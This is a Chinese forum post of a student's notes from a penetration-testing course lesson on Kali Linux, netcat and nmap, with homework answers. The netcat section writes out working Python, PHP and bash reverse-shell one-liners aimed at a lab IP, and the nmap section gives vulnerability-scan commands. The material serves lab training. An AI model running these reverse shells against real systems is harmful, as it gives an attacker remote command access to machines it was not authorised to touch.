发帖
 找回密码
 立即注册
搜索
1 0

分享 20250303Web渗透系统班 第六课 樊子健

技术分享 1104 1 2025-3-16 22:42:00
Kali Linux基础应用

一,渗透测试专用系统

关于渗透测试操作系统有kali 、Cyborg Hawk 、Parrot Security OS 、 Backbox Linux 、BlackArch Linux 、 Pentoo 、Samurai Web Testing 、FrameWork(Samurai-WTF)、Network Security Toolkit(NST) 、 WifiSlax、Bugtraq、Fedora Security Spin、ArchStrike Linux、DEFT Linux 、 Caine这么多个版本。


二,kali Linux系统
Kali Linux是基于Debian的Linux发行版,Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng 超过300个渗透测试工具。安全软件分为:信息收集、脆弱性分析、开发工具、无线攻击、取证工具、Web应用程序、压力测试、嗅探和欺骗、密码攻击、维护访问权限、硬件攻击、逆向工程、硬件攻击。
Kali Linux 是许多好用的安全工具的集合。对于专业人员来说,它有很多的好处,但是对于一些不怀好意的人来说,也可以产生很多大麻烦。小心地使用 Kali,充分利用它的巨大优势。




三,kali Linux系统搭建与优化

vmware 搭建kali虚拟机
kali系统优化



四,netcat简介与使用
NC(netcat)被称为网络工具中的瑞士军刀,体积小巧,但功能强大。Nc主要功能,Nc可以在两台设备上面相互交互,即侦听模式/传

-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能域名服务器
-o file 记录16进制的传输
-p port 本地端口号


-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式                                        
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时



nc的基本使用方法
1、实现连接通讯
      服务端 监听端口 Nc -lnvp 端口
      客户端 连接端口 nc ip 端口
      代表监听本地的端口输出结果不加域名



2、传输文件内容
        服务端:nc -lvp 6666 >2.txt
        客户端:nc ip 端口 <2.txt



3、获取shell
获取shell分为两种,一种是正向shell,一种是反向shell。如果客户端连接服务器端,想要获取服务器端的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想要获取客户端的shell,那么称为反向shell。



python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.153.139",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


php -r '$sock=fsockopen("192.168.153.139",6666);exec("/bin/sh -i <&3 >&3 2>&3");'


bash -i >& /dev/tcp/192.168.153.139/6666 0>&1


五,nmap简介与使用
Nmap是一款开源免费的网络发现和安全审计工具。它被用来快速扫描大型网络.包括主机探测于发现、开放的端口情况、操作系统与应用服务指纹识别及常见安全漏洞。它的图形化界面是Zenamp.


NMAP的功能包括
             主机发现
        端口扫描
        版本侦测
        操作系统侦测



常用参数

-T4指定扫描过程的级别,级别越高扫描速度越快,但也越容易被防火墙或者IDS 屏蔽, 一般推荐使用T4级别
        -sn只进行主机发现,不进行端口扫描
        -〇进行系统版本扫描
        -sV进行服务版本扫描
        -p 扫描指定端口
        -sS发送SYN包扫描
                -sT发送TCP包扫描
        -sA发送ACK包扫描
        -sU UDP扫描
        -Pn 不进行ping扫描
        -script指定脚本扫描

常见的6种 Nmap端口状态及其含义

        open :开放的,表示应用程序正在监听该端口的连接,外部可以访问
        filtered:被过滤的.表示端口被防火墙或其他网络设备阻止,不能访问
        closed:关闭的,表示目标主机未开启该端口
        unfiltered:未被过滤的,表示nmap,无法确定端口所处状态,需进一步探测
        open/ filtered:开放的或被过滤的, Nmap 不能识别
        closed/ filtered:关闭的或被过滤的, Nmap 不能识别


常用的nmap命令


        nmap 192.168.1.1扫描单个目标
        nmap 192.168.1.0/24扫描192.168.1.0这个网段
        nmap 192.168.1.1 -p 21.22,23,80扫描192.168.1.1这个地址是否开放了某端口
        nmap -sS -T4 -sV 192.168.1.1 以sS.方式扫描.级别为T4.结果详细输出,扫描192.168.1.1
        nmap -ss-p1-65535 -v 192.168.1.1扫描192.168.1.1目标主机全部端口
        nmap --script=vuln 192.168.1.135 采用脚本扫描的方式,扫出对方存在的漏洞


在windows10上安装nmap
https://nmap.org/download.html
直接在nmap官网下载windows安装包,下一步下一步安装就可以了

图形化
Intense scan                                 强扫描
Intense scan plus UDP                        密集扫描加UDP
Intense scan, all TCP ports                        密集扫描,所有TCP端口
Intense scan, no ping                        高强度扫描,无ping
Ping scan                                ping扫描
Quick scan                                快速扫描
Slow comprehensive scan                        慢综合扫描
Regular scan                                常规扫描
Quick traceroute                                快速追踪路线
Quick scan plus                                快速扫描增强版


6节课作业
01对自己的kali系统进行优化

02实操nc正向shellnc反弹shellpython反弹shellbash反弹shell截图

03使用nmap中的脚本扫描自己的局域网主机

04结合自己的理解,说明什么是端口,什么是服务,它俩之间的联系是什么



端口:程序运行进行通信时流量需要经过的“关隘”,端口范围1-65535

服务:运行程序实现某些功能
它俩之间的联系:每项服务都要占用一个单独的端口





──── 0人觉得很赞 ────

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
免责声明:
1、本论坛中所有用户发布的内容仅代表作者个人观点,与本网站立场无关,本站不对其真实性、完整性或观点承担任何责任。
2、本论坛所提供的全部信息与内容,不保证其准确性、完整性或时效性。因阅读或使用本站内容而产生的任何误导、损失或风险,本站概不承担任何连带或法律责任。
3、当国家司法、行政机关依照法定程序要求本论坛披露用户信息时,本站予以配合并因此免责。
4、因网络线路故障、技术问题、不可抗力或本站无法控制的其他原因导致的服务中断或暂停,本站不承担由此造成的任何直接或间接损失。
5、对于任何通过技术手段破坏、攻击本论坛系统或扰乱正常秩序的行为,本站有权采取包括但不限于限制账号、封禁账号、追究法律责任等措施。
2025-3-16 22:42:37
python反弹shell,bash反弹shell截图还没太明白
您需要登录后才可以回帖 立即登录
高级模式
返回